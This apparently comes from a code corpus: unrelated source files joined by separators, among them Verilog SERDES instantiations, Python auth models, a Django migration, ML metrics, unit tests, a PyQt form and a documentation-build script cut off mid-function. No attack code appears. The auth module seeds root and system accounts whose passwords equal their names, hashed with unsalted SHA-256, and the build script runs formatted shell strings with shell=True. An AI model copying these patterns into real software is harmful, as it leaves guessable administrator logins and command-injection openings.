.COUNTER_WRAPAROUND ("WRAPAROUND"),
.DELAY_SRC ("IDATAIN"),
.SERDES_MODE ("SLAVE"),
.SIM_TAPDELAY_VALUE ($sim_tap_delay)
) iodelay_s (
.IDATAIN (rx_data_in), // data from IBUFDS
.TOUT (), // tri-state signal to IOB
.DOUT (), // output data to IOB
.T (1'b1), // tri-state control from OLOGIC/OSERDES2
.ODATAIN (1'b0), // data from OLOGIC/OSERDES2
.DATAOUT (ddly_s), // Slave output data to ILOGIC/ISERDES2
.DATAOUT2 (), //
.IOCLK0 ($rx_io_clock), // High speed IO clock for calibration
.IOCLK1 (1'b0),
.CLK ($g_clock), // Fabric clock (GCLK) for control signals
.CAL (cal_data_slave), // Calibrate control signal
.INC (inc_data), // Increment counter
.CE (ce_data), // Clock Enable
.RST (rst_data), // Reset delay line
.BUSY (busys) // output signal indicating sync circuit has finished / calibration has finished
);
//
// Master ISERDES
//
ISERDES2 #(
.DATA_WIDTH (5),
.DATA_RATE ("SDR"),
.BITSLIP_ENABLE ("$bit_slip_enable"),
.SERDES_MODE ("MASTER"),
.INTERFACE_TYPE ("RETIMED"))
iserdes_m (
.D (ddly_m),
.CE0 (1'b1),
.CLK0 ($rx_io_clock),
.CLK1 (1'b0),
.IOCE ($rx_serdes_strobe),
.RST ($reset),
.CLKDIV ($g_clock),
.SHIFTIN (pd_edge),
.BITSLIP ($bit_slip),
.FABRICOUT (),
.Q4 ($data_out[4]),
.Q3 ($data_out[3]),
.Q2 ($data_out[2]),
.Q1 ($data_out[1]),
.DFB (),
.CFB0 (),
.CFB1 (),
.VALID (valid_data),
.INCDEC (incdec_data),
.SHIFTOUT (cascade));
//
// Slave ISERDES
//
ISERDES2 #(
.DATA_WIDTH (5),
.DATA_RATE ("SDR"),
.BITSLIP_ENABLE ("$bit_slip_enable"),
.SERDES_MODE ("SLAVE"),
.INTERFACE_TYPE ("RETIMED")
) iserdes_s (
.D (ddly_s),
.CE0 (1'b1),
.CLK0 ($rx_io_clock),
.CLK1 (1'b0),
.IOCE ($rx_serdes_strobe),
.RST ($reset),
.CLKDIV ($g_clock),
.SHIFTIN (cascade),
.BITSLIP ($bit_slip),
.FABRICOUT (),
.Q4 ($data_out[0]),
.Q3 (),
.Q2 (),
.Q1 (),
.DFB (),
.CFB0 (),
.CFB1 (),
.VALID (),
.INCDEC (),
.SHIFTOUT (pd_edge));
always @ (posedge $g_clock or posedge $reset) begin
if ($reset)
rxpdcntr <= 8'h7f;
else if (ce_data)
if (inc_data)
rxpdcntr <= rxpdcntr + 1'b1;
else
rxpdcntr <= rxpdcntr - 1'b1;
end
"""
|
import os
NRESULTS_ALLOWED_SCHEMAS = ['nr_nresults/nr-nresults-v1.0.0.json']
NRESULTS_PREFERRED_SCHEMA = 'nr_nresults/nr-nresults-v1.0.0.json'
DRAFT_NRESULT_PID_TYPE = 'dnrnrs'
DRAFT_NRESULT_RECORD = 'nr_nresults.record:DraftNResultRecord'
PUBLISHED_NRESULT_PID_TYPE = 'nrnrs'
PUBLISHED_NRESULT_RECORD = 'nr_nresults.record:PublishedNResultRecord'
ALL_NRESULTS_PID_TYPE = 'anrnrs'
ALL_NRESULTS_RECORD_CLASS = 'nr_nresults.record:AllNResultRecord'
published_index_name = 'nr_nresults-nr-nresults-v1.0.0'
draft_index_name = 'draft-nr_nresults-nr-nresults-v1.0.0'
all_nresults_index_name = 'nr-all-nresults'
prefixed_published_index_name = os.environ.get('INVENIO_SEARCH_INDEX_PREFIX',
'') + published_index_name
prefixed_draft_index_name = os.environ.get('INVENIO_SEARCH_INDEX_PREFIX', '') + draft_index_name
prefixed_all_nresults_index_name = os.environ.get('INVENIO_SEARCH_INDEX_PREFIX', '') + all_nresults_index_name
|
# -*- coding: utf-8 -*-
# Copyright 2015 www.suishouguan.com
#
# Licensed under the Private License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/samuelbaizg/ssguan/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ssguan.ignitor import IGNITOR_DOMAIN
from ssguan.ignitor.auth import logger
from ssguan.ignitor.base import context
from ssguan.ignitor.orm import properti
from ssguan.ignitor.orm.error import UniqueError
from ssguan.ignitor.orm.model import Model
from ssguan.ignitor.orm.validator import UniqueValidator, IllegalValidator, \
LengthValidator
from ssguan.ignitor.utility import crypt, kind
from ssguan.ignitor.base.struct import JsonMixin
def encrypt_password(password):
return password if kind.str_is_empty(password) else crypt.str_to_sha256_hex(password)
class User(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
ID_ANONYMOUS = "anonymous"
ID_ROOT = "root"
ID_SYSTEM = "system"
ACCOUNT_NAME_ANONYMOUS = "anonymous"
ACCOUNT_NAME_ROOT = "root"
ACCOUNT_NAME_SYSTEM = "system"
u_account = properti.StringProperty(required=True, validator=[LengthValidator(minlength=3, maxlength=20), UniqueValidator("u_account"), IllegalValidator()])
u_password = properti.StringProperty(required=True, validator=IllegalValidator())
u_attributes = properti.DictProperty(required=False)
u_preferences = properti.DictProperty(required=False)
disable_flag = properti.BooleanProperty(default=False)
def is_anonymous(self):
return self.ID_ANONYMOUS == self.key()
def is_superadmin(self):
return self.ID_ROOT == self.key()
@classmethod
def create_schema(cls, dbconn=None):
schema = super(User, cls).create_schema(dbconn=dbconn)
try:
user1 = User(u_account=cls.ACCOUNT_NAME_ANONYMOUS,
u_password=encrypt_password(cls.ACCOUNT_NAME_ANONYMOUS))
user1.create(None, key=cls.ID_ANONYMOUS)
user1 = User(u_account=cls.ACCOUNT_NAME_ROOT,
u_password=encrypt_password(cls.ACCOUNT_NAME_ROOT))
user1.create(None, key=cls.ID_ROOT)
user1 = User(u_account=cls.ACCOUNT_NAME_SYSTEM,
u_password=encrypt_password(cls.ACCOUNT_NAME_SYSTEM))
user1.create(None, key=cls.ID_SYSTEM)
except UniqueError as e:
logger.info(e.message)
assert e.get_argument("label") == "u_account"
return schema
class Role(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
ID_ANONYMOUS = "role_anonymous_0"
ANONYMOUS_ROLE_CODE = "anonymous"
ANONYMOUS_ROLE_NAME = "anonymous"
role_code = properti.StringProperty(required=True, validator=[UniqueValidator("role_code")])
role_name = properti.StringProperty(required=True, validator=[UniqueValidator("role_name")])
reserve_flag = properti.BooleanProperty(default=False)
enable_flag = properti.BooleanProperty(default=True)
def fetch_roleoperations(self):
"""
:rtype list: return the operation codes of this role
"""
query = RoleOperation.all()
query.filter("role_id =", self.key())
roleopeations = query.fetch()
codes = []
for ro in roleopeations:
codes.append(ro.operation_code)
return codes
def delete_roleoperations(self, operation_code=None):
query = RoleOperation.all()
query.filter("role_id =", self.key())
if operation_code is not None:
query.filter("operation_code =", operation_code)
return query.delete(context.get_user_id())
def create_roleoperation(self, operation_code):
roleoperation = RoleOperation(role_id=self.key(
), operation_code=operation_code)
roleoperation.create(context.get_user_id())
return roleoperation
@classmethod
def create_schema(cls, dbconn=None):
schema = super(Role, cls).create_schema(dbconn=dbconn)
try:
role = Role(role_code=cls.ANONYMOUS_ROLE_CODE, role_name=cls.ANONYMOUS_ROLE_NAME, reserve_flag=True)
role.create(None, key=cls.ID_ANONYMOUS)
except UniqueError as e:
logger.info(e.message)
assert e.get_argument("label") == "roleName"
return schema
class RoleOperation(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
role_id = properti.StringProperty(required=True)
operation_code = properti.StringProperty(length=200, required=True, validator=[
UniqueValidator("operation_code", scope=["role_id"])])
class UserRole(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
user_id = properti.StringProperty(required=True)
role_id = properti.StringProperty(required=True)
@classmethod
def create_schema(cls, dbconn=None):
schema = super(UserRole, cls).create_schema(dbconn=dbconn)
try:
userrole = UserRole(user_id=User.ID_ANONYMOUS, role_id=Role.ID_ANONYMOUS)
userrole.create(None)
except UniqueError as e:
logger.info(e.message)
assert e.get_argument("label") == "roleName"
return schema
class Token(JsonMixin):
def __init__(self, user_id, u_account, role_codes, operation_codes, anonymous=False):
self.__user_id = user_id
self.__account = u_account
self.__anonymous = anonymous
self.__role_codes = list(role_codes)
self.__operation_codes = list(operation_codes)
self.__rsa_key = crypt.rsa_gen_key_hex(256)
@property
def user_id(self):
return self.__user_id
@property
def account(self):
return self.__account
@property
def rsa_key(self):
return self.__rsa_key
@property
def role_codes(self):
return self.__role_codes
@property
def operation_codes(self):
return self.__operation_codes
def is_anonymous(self):
return self.__anonymous is True
def __setitem__(self, key, value):
self.__dict__[key] = value
def to_dict(self):
dic = {}
dic['lopuKey'] = {'e': self.__rsa_key['e'], 'n': self.__rsa_key['n']}
dic['anonymous'] = self.__anonymous
dic['account'] = self.__account
dic['operation_codes'] = self.__operation_codes
for key, value in self.__dict__.items():
if not key.startswith("__"):
dic[key] = value
return dic
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-10-17 13:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20181015_0847'),
]
operations = [
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pub_date', models.DateTimeField(verbose_name='date published')),
('user_name', models.CharField(max_length=100)),
('comment', models.CharField(max_length=200)),
('rating', models.IntegerField(choices=[(1, '1'), (2, '2'), (3, '3'), (4, '4'), (5, '5')])),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.Project')),
],
),
migrations.AlterField(
model_name='profile',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL),
),
]
|
from sklearn.metrics import f1_score
import torch
import torch.nn as nn
from torch.nn import Module
import torch.nn.functional as F
import math
import torch.optim as optim
import numpy as np
import time
from utils import inverse_norm
# from plot_fig.histogram import plot_histogram
def accuracy(output, labels):
preds = output.max(1)[1].type_as(labels)
correct = preds.eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def f1(output, labels):
preds = output.max(1)[1]
preds = preds.cpu().detach().numpy()
labels = labels.cpu().detach().numpy()
micro = f1_score(labels, preds, average='micro')
macro = f1_score(labels, preds, average='macro')
return micro, macro
def MAPE_y_head(pre_volume, true_volume):
MAPE_SCORE = []
eps = 1e-5
for i in range(len(pre_volume)):
cur_mape = abs(pre_volume[i] - true_volume[i])/(pre_volume[i]+eps)
MAPE_SCORE.append(cur_mape.item())
return np.mean(MAPE_SCORE)
def MAPE_y(pre_volume, true_volume):
MAPE_SCORE = []
eps = 1e-5
for i in range(len(pre_volume)):
cur_mape = abs(pre_volume[i] - true_volume[i])/(true_volume[i]+eps)
MAPE_SCORE.append(cur_mape.item())
return np.mean(MAPE_SCORE)
def RMSE(pre_volume, true_volume):
RMSE_SCORE = []
for i in range(len(pre_volume)):
cur_rmse = (pre_volume[i] - true_volume[i])**2
RMSE_SCORE.append(cur_rmse.item())
return (np.sum(RMSE_SCORE)/len(pre_volume))**0.5
def show_info(epoch, leida, time_slice_volume, unnormed_ways_segment_volume_dict):
# if len(time_slice_volume) == 12:
# file_path = "hangzhou"
# else:
file_path = "jinan"
with open("{}\log\{}_epoch_{}_roadid_{}_log.txt".format(file_path,time.strftime('%Y_%m_%d_%H_%M_%S',time.localtime(time.time())),epoch,leida), "w", encoding='utf-8') as f:
# print("cur_raod id:{}".format(leida))
f.write("cur_raod id:{}\n".format(leida))
for i in range(len(time_slice_volume)):
# print("第{}个时间片上\t预测流量:{:.2f}\t真实流量:{}".format(i, time_slice_volume[i], unnormed_ways_segment_volume_dict[leida][i]))
f.write("第{}个时间片上\t预测流量:{:.2f}\t真实流量:{}\n".format(i, time_slice_volume[i], unnormed_ways_segment_volume_dict[leida][i]))
def calculate_index(epoch, pre_leida_time_slice_volume_dict, unnormed_ways_segment_volume_dict, volume_sqrt_var, volume_mean, topk):
for leida, time_slice_volume in pre_leida_time_slice_volume_dict.items():
for idx,volume in enumerate(time_slice_volume):
pre_leida_time_slice_volume_dict[leida][idx] = volume*volume_sqrt_var[idx] + volume_mean[idx]
leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head, leida_pre_RMSE_info = {}, {}, {}
for leida, time_slice_volume in pre_leida_time_slice_volume_dict.items(): # key=leida_id value=[] len =12
for idx,item in enumerate(time_slice_volume):
if item < 0:
time_slice_volume[idx] = -time_slice_volume[idx]
leida_pre_MAPE_info_y[leida] = MAPE_y(time_slice_volume, unnormed_ways_segment_volume_dict[leida])
leida_pre_MAPE_info_y_head[leida] = MAPE_y_head(time_slice_volume, unnormed_ways_segment_volume_dict[leida])
leida_pre_RMSE_info[leida] = RMSE(time_slice_volume, unnormed_ways_segment_volume_dict[leida])
show_info(epoch, leida, time_slice_volume, unnormed_ways_segment_volume_dict)
# plot_histogram(pre_leida_time_slice_volume_dict, unnormed_ways_segment_volume_dict)
return leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head, leida_pre_RMSE_info
def evaluate_metric(epoch, output_embedding, train_ways_segment_volume_dict, train_ways_segment_vec_dict, test_ways_segment_volume_dict, unnormed_ways_segment_volume_dict, topk, volume_sqrt_var, volume_mean):
true_volume = []
MAP_SCORE = []
test_ways_segment_vec_dict = {}
test_ways_segment_list = list(test_ways_segment_volume_dict.keys())
for i, item in enumerate(test_ways_segment_list):
test_ways_segment_vec_dict[item] = output_embedding[:, item]
pre_leida_time_slice_volume_dict = { }
for k1,v1 in test_ways_segment_vec_dict.items():
score_dict = {}
for k2, v2 in train_ways_segment_vec_dict.items():
if(k1 != k2):
curr_score = torch.cosine_similarity(v1, v2, dim=-1)
score_dict[k2] = curr_score # size=12
sorted_score_dict_max_list = []
for j in range(v1.shape[0]):
sorted_score_dict_max_list.append([item[0] for item in sorted(score_dict.items(), key=lambda item:item[1][j], reverse = True)[:topk]])
pre_volume = []
for time_slice, top_list in enumerate(sorted_score_dict_max_list):
sum_volume_max = .0
sum_sim_score = .0
for top_item in top_list:
sum_volume_max = sum_volume_max + train_ways_segment_volume_dict[top_item][time_slice]*score_dict[top_item][time_slice]
sum_sim_score = sum_sim_score + score_dict[top_item][time_slice]
cur_pre_volume = sum_volume_max/sum_sim_score
pre_volume.append(cur_pre_volume)
pre_leida_time_slice_volume_dict[k1] = pre_volume
leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head,leida_pre_RMSE_info = calculate_index(epoch, pre_leida_time_slice_volume_dict, unnormed_ways_segment_volume_dict, volume_sqrt_var, volume_mean, topk)
return leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head,leida_pre_RMSE_info
|
from data_stack.io.resources import StreamedTextResource
import pandas as pd
import torch
from data_stack.dataset.iterator import DatasetIterator
class ArrhythmiaIterator(DatasetIterator):
def __init__(self, samples_stream: StreamedTextResource, targets_stream: StreamedTextResource):
self.samples = pd.read_csv(samples_stream)
self.targets = pd.read_csv(targets_stream)
samples_stream.close()
targets_stream.close()
def __len__(self):
return len(self.samples)
def __getitem__(self, index: int):
""" Returns the sample and target of the dataset at given index position.
:param index: index within dataset
:return: sample, target, tag
"""
sample_tensor = torch.FloatTensor(self.samples.iloc[index].to_numpy())
target = int(self.targets.iloc[index])
return sample_tensor, target, target
|
# Copyright 2021 Canonical Ltd.
# See LICENSE file for licensing details.
"""Module testing the Legend SDLC Operator."""
import json
from charms.finos_legend_libs.v0 import legend_operator_testing
from ops import testing as ops_testing
import charm
class LegendSdlcTestWrapper(charm.LegendSDLCServerCharm):
@classmethod
def _get_relations_test_data(cls):
return {
cls._get_legend_db_relation_name(): {
"legend-db-connection": json.dumps(
{
"username": "test_db_user",
"password": "test_db_pass",
"database": "test_db_name",
"uri": "test_db_uri",
}
)
},
cls._get_legend_gitlab_relation_name(): {
"legend-gitlab-connection": json.dumps(
{
"gitlab_host": "gitlab_test_host",
"gitlab_port": 7667,
"gitlab_scheme": "https",
"client_id": "test_client_id",
"client_secret": "test_client_secret",
"openid_discovery_url": "test_discovery_url",
"gitlab_host_cert_b64": "test_gitlab_cert",
}
)
},
}
def _get_service_configs_clone(self, relation_data):
return {}
class LegendSdlcTestCase(legend_operator_testing.TestBaseFinosCoreServiceLegendCharm):
@classmethod
def _set_up_harness(cls):
harness = ops_testing.Harness(LegendSdlcTestWrapper)
return harness
def test_get_core_legend_service_configs(self):
self._test_get_core_legend_service_configs()
def test_relations_waiting(self):
self._test_relations_waiting()
def test_studio_relation_joined(self):
self.harness.set_leader(True)
self.harness.begin_with_initial_hooks()
relator_name = "finos-legend-studio-k8s"
rel_id = self.harness.add_relation(charm.LEGEND_STUDIO_RELATION_NAME, relator_name)
relator_unit = "%s/0" % relator_name
self.harness.add_relation_unit(rel_id, relator_unit)
self.harness.update_relation_data(rel_id, relator_unit, {})
rel = self.harness.charm.framework.model.get_relation(
charm.LEGEND_STUDIO_RELATION_NAME, rel_id
)
self.assertEqual(
rel.data[self.harness.charm.app],
{"legend-sdlc-url": self.harness.charm._get_sdlc_service_url()},
)
|
# coding: utf-8
from __future__ import unicode_literals
from spacy.matcher import PhraseMatcher
from spacy.lang.en import English
from spacy.compat import pickle
def test_issue3248_1():
"""Test that the PhraseMatcher correctly reports its number of rules, not
total number of patterns."""
nlp = English()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("TEST1", None, nlp("a"), nlp("b"), nlp("c"))
matcher.add("TEST2", None, nlp("d"))
assert len(matcher) == 2
def test_issue3248_2():
"""Test that the PhraseMatcher can be pickled correctly."""
nlp = English()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("TEST1", None, nlp("a"), nlp("b"), nlp("c"))
matcher.add("TEST2", None, nlp("d"))
data = pickle.dumps(matcher)
new_matcher = pickle.loads(data)
assert len(new_matcher) == len(matcher)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Part of the masterfile package: https://github.com/uwmadison-chm/masterfile
# Copyright (c) 2020 Board of Regents of the University of Wisconsin System
# Written by Nate Vack <njvack@wisc.edu> at the Center for Healthy Minds
# at the University of Wisconsin-Madison.
# Released under MIT licence; see LICENSE at the package root.
from masterfile.formatters import column_number_to_column_id
import pytest
class TestFormatters(object):
def test_column_number_to_column_id_normal_inputs(self):
assert column_number_to_column_id(1) == 'A'
assert column_number_to_column_id(26) == 'Z'
assert column_number_to_column_id(27) == 'AA'
assert column_number_to_column_id(28) == 'AB'
assert column_number_to_column_id(702) == 'ZZ'
assert column_number_to_column_id(703) == 'AAA'
assert column_number_to_column_id(704) == 'AAB'
def test_column_number_to_column_id_bad_inputs(self):
with pytest.raises(AttributeError):
column_number_to_column_id('A')
with pytest.raises(AttributeError):
column_number_to_column_id(1.1)
with pytest.raises(AttributeError):
column_number_to_column_id(-1)
with pytest.raises(AttributeError):
column_number_to_column_id(0)
|
# Title: 우수 마을
# Link: https://www.acmicpc.net/problem/1949
import sys
from collections import defaultdict
sys.setrecursionlimit(10 ** 6)
read_single_int = lambda: int(sys.stdin.readline().strip())
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def get_max(vil: int, select: int, dp: list, edges: defaultdict, popls: list, p_node: int):
if dp[vil][select] != -1:
return dp[vil][select]
ans = popls[vil] if select else 0
for child in edges[vil]:
if child == p_node:
continue
if select:
ans += get_max(child, 0, dp, edges, popls, vil)
else:
ans += max(get_max(child, 0, dp, edges, popls, vil), get_max(child, 1, dp, edges, popls, vil))
dp[vil][select] = ans
return ans
def solution(n: int, popls: list, edges: defaultdict):
dp = [[-1 for _ in range(2)] for _ in range(n+1)]
return max(get_max(1, 0, dp, edges, popls, 0), get_max(1, 1, dp, edges, popls, 0))
def main():
n = read_single_int()
popls = [0] + read_list_int()
edges = defaultdict(lambda: [])
for _ in range(n-1):
a, b = read_list_int()
edges[a].append(b)
edges[b].append(a)
print(solution(n, popls, edges))
if __name__ == '__main__':
main()
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow
class Ui_createUserWidget(QMainWindow):
def __init__(self):
super(Ui_createUserWidget, self).__init__()
self.setupUi()
def setupUi(self):
self.setObjectName("createUserWidget")
self.setFixedSize(412, 187)
#background setup
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(135, 0, 202))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(135, 0, 202))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
self.setPalette(palette)
#icon setup
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("icon.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.setWindowIcon(icon)
#text white color setup
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
#font setup
font = QtGui.QFont()
font.setFamily("Bahnschrift SemiBold SemiConden")
font.setPointSize(14)
self.label = QtWidgets.QLabel(self)
self.label.setGeometry(QtCore.QRect(160, 20, 101, 31))
self.label.setPalette(palette)
self.label.setFont(font)
self.label.setObjectName("label")
font.setPointSize(13)
self.newUserInput = QtWidgets.QLineEdit(self)
self.newUserInput.setGeometry(QtCore.QRect(30, 60, 351, 41))
self.newUserInput.setFont(font)
self.newUserInput.setAlignment(QtCore.Qt.AlignCenter)
self.newUserInput.setObjectName("newUserInput")
self.newUserInput.setToolTip("Enter a unique username")
self.createUserButton = QtWidgets.QPushButton(self)
self.createUserButton.setGeometry(QtCore.QRect(140, 120, 131, 41))
font.setPointSize(12)
self.createUserButton.setFont(font)
self.createUserButton.setObjectName("createUserButton")
self.retranslateUi(self)
QtCore.QMetaObject.connectSlotsByName(self)
def retranslateUi(self, createUserWidget):
_translate = QtCore.QCoreApplication.translate
createUserWidget.setWindowTitle(_translate("createUserWidget", "New User"))
self.label.setText(_translate("createUserWidget", "Username:"))
self.newUserInput.setPlaceholderText(_translate("createUserWidget", "Enter Username"))
self.createUserButton.setText(_translate("createUserWidget", "CREATE USER"))
|
#!/usr/bin/env python
from __future__ import print_function
__author__ = 'Whirliwig'
__license__ = 'MIT'
__version__ = '0.5'
__email__ = 'ant@dervishsoftware.com'
from os import path, chdir, listdir, walk, putenv
import shutil
import sys
import tomdoc_converter_objc
import subprocess
from tomdoc_converter_objc import OutputGenerator, InputTranslator
script_path = path.dirname(path.realpath(__file__))
# Add 'Python' in the same directory as this script to sys.path
sys.path.append(path.join(script_path, "Python"))
import argparse
import distutils
from tempfile import mkdtemp
from pprint import pprint as pp
verbosity = 0
def which(program):
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
doxygen_binary=which('doxygen')
appledoc_binary=which('appledoc')
def convert_tomdoc(input_dir, temp_dir, translator, generator):
src_dirs = [x[0] for x in walk(input_dir)]
tomdoc_converter_objc.generate(src_dirs, temp_dir, translator, generator, False)
def bool_str(truthy):
if truthy:
return 'YES'
else:
return 'NO'
def generate_docs(doxygen_templates_dir, args):
temp_dir = mkdtemp('','gendocs.')
print("doxygen = {}, appledoc = {}".format(doxygen_binary, appledoc_binary))
# Pre-requisites
if args.generator == 'appledoc':
if not appledoc_binary:
print("Cannot find appledoc binary.", file=sys.stderr)
exit(1)
generator = OutputGenerator.appledoc
elif args.generator == 'doxygen':
if not doxygen_binary:
print("Cannot find doxygen binary.", file=sys.stderr)
exit(1)
generator = OutputGenerator.doxygen
company_name = args.company
if not company_name: company_name = 'unknown'
company_id=args.company_id
if not company_id: company_id = '.'.join(['com', company_name])
docset_name = args.name
docset_id = '.'.join([company_id, args.name])
src_dir = args.srcdir
index_path = args.index
dot_path = args.dot_path
output_dir = args.output
if not output_dir:
output_dir = path.join(temp_dir,'doc')
doxygen_template = path.extsep.join([args.format, args.language, 'Doxyfile'])
source_browser_yn = bool_str(args.source)
print('Docset =',docset_id)
"""
Convert headers from Tomdoc, if required
"""
index_file=None
if args.tomdoc or args.translate:
if args.tomdoc:
header_translator = InputTranslator.tomdoc
else:
header_translator = InputTranslator.simple
print("Converting headers in", src_dir)
if (index_path):
shutil.copy(index_path, temp_dir)
index_file = path.abspath('../{}'.format(path.basename(index_path)))
reformatted_headers_dir = path.join(temp_dir, 'reformatted_headers')
convert_tomdoc(src_dir, reformatted_headers_dir, header_translator, generator)
src_dir = reformatted_headers_dir
docset_feed_url = 'http://www.madeupname.com/docsets/'
if generator == OutputGenerator.appledoc:
"""
Appledoc
"""
print("Generating appledoc in",temp_dir)
# As of 31 August, 2013, these extra flags to appledoc are only supported in the version of
# appledoc available here: https://github.com/antmd/appledoc:
# --ignore-symbol <glob>
# --require-leader-for-local-crossrefs
# A pull request to the parent repository has been made
appledoc_extra_flags=[]
if subprocess.check_call("{} --help | grep 'ignore-symbol' >/dev/null".format(appledoc_binary), shell=True):
appledoc_extra_flags += ['--ignore-symbol', '*Deprecated*']
if subprocess.check_call('{} --help | grep "require-leader-for-local-crossrefs" >/dev/null'.format(appledoc_binary), shell=True):
appledoc_extra_flags += ['--require-leader-for-local-crossrefs']
appledoc_standard_options = [
'--project-name', docset_name,
'--project-company', company_name,
'--company-id', company_id,
'--docset-atom-filename', '{}.atom'.format(docset_name),
'--docset-feed-url', '{}/%DOCSETATOMFILENAME'.format(docset_feed_url),
'--docset-package-url', '{}/%DOCSETPACKAGEFILENAME'.format(docset_feed_url),
'--docset-fallback-url', docset_feed_url,
'--docset-bundle-filename', '.'.join([docset_id,'docset']),
'--output', output_dir,
'--logformat', 'xcode' ,
'--ignore', '*.m' ,
'--ignore', '*Deprecated*' ,
'--verbose', str(verbosity),
'--keep-undocumented-objects',
'--keep-undocumented-members',
'--keep-intermediate-files',
'--no-repeat-first-par',
'--no-warn-invalid-crossref',
'--install-docset'
]
if index_file:
appledoc_standard_options += ['--index-desc', index_file]
appledoc_cmd = [appledoc_binary] + appledoc_standard_options + appledoc_extra_flags + [src_dir]
#print("Running : {}".format(' '.join(appledoc_cmd)))
try:
subprocess.check_call(appledoc_cmd)
except subprocess.CalledProcessError as ex:
"""
print('Appledoc failed to generate the documentation')
return False
"""
# Looks like Appledoc returns non-zero code, even if successful
pass
elif generator == OutputGenerator.doxygen:
"""
Doxygen
"""
print("Generating doxygen in",temp_dir)
if dot_path:
if not path.exists(dot_path):
print("Cannot find dot at {}".format(dot_path), file=sys.stderr)
exit(1)
else:
dot_path = which('dot')
if not dot_path:
print("Cannot find dot on PATH. Will not generate diagrams")
if dot_path:
putenv('DOT_PATH', dot_path)
putenv('HAVE_DOT', 'YES')
else:
putenv('HAVE_DOT', 'NO')
putenv('INPUT_DIR', '"{}"'.format(src_dir))
putenv('HTML_HEADER','')
putenv('DOCSET_PUBLISHER_ID', company_id)
putenv('DOCSET_PUBLISHER', company_name)
putenv('DOCSET_BUNDLE_ID', docset_id)
putenv('FRAMEWORK', docset_name)
putenv('OUTPUT_DIRECTORY', output_dir)
putenv('SOURCE_BROWSER', source_browser_yn)
"""
TODO
# Generate the index page
pushd "${GeneratedHeadersDir}" >/dev/null 2>&1
cat > mainpage.h <<-EOF
/*! \\mainpage ${FRAMEWORK} Main Page
*
EOF
if [[ ! -z "$INDEX_FILE" ]]; then
cat < "../${INDEX_FILE}" >> mainpage.h
fi
cat >> mainpage.h <<-EOF
*/
EOF
popd >/dev/null 2>&1
"""
try:
subprocess.check_call([doxygen_binary, path.join(doxygen_templates_dir, doxygen_template)])
subprocess.check_call("cd {} && make install".format(output_dir), shell=True)
except subprocess.CalledProcessError as e:
print("Doxygen failed with error".format(e), file=sys.stderr)
return False
return True
# Clean-up temporary directory
#shutil.rmtree(temp_dir)
def parse_args(doxygen_templates):
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('srcdir', help='Directory containing the source header files', default = '.')
arg_parser.add_argument('-o', '--output', help='Directory for the generated docs', nargs='?')
arg_parser.add_argument('-i', '--index', help='Path to the index page', required=False)
arg_parser.add_argument('-n', '--name', help='The name of the docset (appears on the doc pages)', required=True)
arg_parser.add_argument('-c', '--company', help='The name of the company owning the source', required=False)
arg_parser.add_argument('-d', '--company-id', help='The id of the company in reverse-DNS style', required=False)
arg_parser.add_argument('-t', '--tomdoc', help='Turn on TomDoc conversion of input files', action='store_true')
arg_parser.add_argument('-x', '--translate', help='Simple conversion of non-doc comments to doc-comments', action='store_true')
arg_parser.add_argument('-g', '--generator', help='The output generator', choices=['appledoc', 'doxygen'], default='appledoc')
doxygen_group = arg_parser.add_argument_group('doxygen-only arguments', 'Options to customise doxygen output')
doxygen_group.add_argument('-f', '--format', help='Output format', choices=['docset', 'html'], default='docset', required=False)
doxygen_group.add_argument('-s', '--source', help='Include source browser', action='store_true', required=False)
doxygen_group.add_argument('-l', '--language', help='Force the language', choices=['c++', 'objc', 'all'], default='all', required=False)
doxygen_group.add_argument('--dot-path', help='The path to "dot" for doxygen. Default is binary found on PATH.', required=False)
args = arg_parser.parse_args()
return args
def get_doxygen_templates(template_dir):
